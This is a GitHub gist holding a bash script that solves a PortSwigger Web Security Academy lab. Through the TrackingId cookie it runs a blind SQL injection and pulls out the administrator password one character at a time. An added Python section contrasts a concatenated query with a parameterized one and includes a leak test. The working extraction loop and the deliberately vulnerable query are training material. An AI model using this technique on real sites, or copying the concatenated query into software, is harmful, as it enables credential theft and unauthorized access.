@svanellewee
Last active June 15, 2021 20:37
Blind SQL Injection!
```bash
#!/usr/bin/env bash
# Copy the GET request, and insert the blind SQL in the TrackingId value...
# Then add a changing variable in the query

# Candidate characters tried at each password position.
alpha=( {a..z} {A..Z} {0..9} \( \) % $ @ \& \# \* \& ^ \~ + _ / )
results=()
for index in {1..100}
do
    # Note: the "- 2" bound stops before the last two entries of alpha (_ and /).
    for ((chi = 0; chi < ${#alpha[@]} - 2; chi++))
    do
        a="${alpha[chi]}"
        # The injected condition is true only when character ${index} of the
        # password equals ${a}; the response then contains "Welcome".
        if curl 'https://ac2e1f191ee6e67680981fd200c50090.web-security-academy.net/' \
            -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0' \
            -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \
            -H 'Accept-Language: en-US,en;q=0.5' \
            --compressed \
            -H 'Referer: https://portswigger.net/' \
            -H 'Connection: keep-alive' \
            -H "Cookie: TrackingId=xaaw' OR SUBSTRING((SELECT Password FROM Users WHERE Username = 'administrator'), ${index}, 1) = '${a}; session=VkyBAyZ5d5nGU1euvjZwkkh9Pv01gmS3" \
            -H 'Upgrade-Insecure-Requests: 1' -H 'Cache-Control: max-age=0' -s | grep -q Welcome
        then
            # Quoted append, so entries such as * are not glob-expanded.
            results+=("${a}")
            echo ">>>>>${results[*]}"
            break
        else
            echo "nope"
        fi
    done
done
echo "${results[*]}"
```
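
The script above works only when the application pastes the TrackingId cookie into SQL text, so the "Welcome" banner becomes a true/false answer. As an added example (not part of the gist or the lab's code), the lookup is shown concatenated and then parameterized against a constructed in-memory SQLite database; the `TrackedUsers` table, the function names and the sample password are assumptions, and SQLite's `substr()` stands in for `SUBSTRING`.

```python
import sqlite3

def make_db():
    """Constructed sample data; TrackedUsers is a hypothetical table name."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE TrackedUsers (TrackingId TEXT);
        CREATE TABLE Users (Username TEXT, Password TEXT);
        INSERT INTO TrackedUsers VALUES ('xaaw-known');
        INSERT INTO Users VALUES ('administrator', 'constructed-secret');
    """)
    return db

def greet_vulnerable(db, tracking_id):
    # Weak form: the cookie value becomes part of the SQL text, so a quote
    # in the cookie ends the string literal and the rest runs as SQL.
    sql = ("SELECT TrackingId FROM TrackedUsers WHERE TrackingId = '"
           + tracking_id + "'")
    return db.execute(sql).fetchone() is not None   # True -> "Welcome" shown

def greet_parameterized(db, tracking_id):
    # Corrected form: the cookie is bound as data and never parsed as SQL.
    sql = "SELECT TrackingId FROM TrackedUsers WHERE TrackingId = ?"
    return db.execute(sql, (tracking_id,)).fetchone() is not None

def probe(position, guess):
    # Same shape as the cookie value in the script above.
    return ("xaaw' OR substr((SELECT Password FROM Users "
            "WHERE Username = 'administrator'), %d, 1) = '%s"
            % (position, guess))

def oracle_leaks(greet):
    """True if the response differs between a right and a wrong guess."""
    db = make_db()
    right = greet(db, probe(1, "c"))   # constructed password starts with 'c'
    wrong = greet(db, probe(1, "x"))
    return right != wrong

if __name__ == "__main__":
    print("concatenated query leaks:", oracle_leaks(greet_vulnerable))
    print("parameterized query leaks:", oracle_leaks(greet_parameterized))
```

`oracle_leaks` can be kept as a regression test: it should stay false for every query that takes a cookie or other request value.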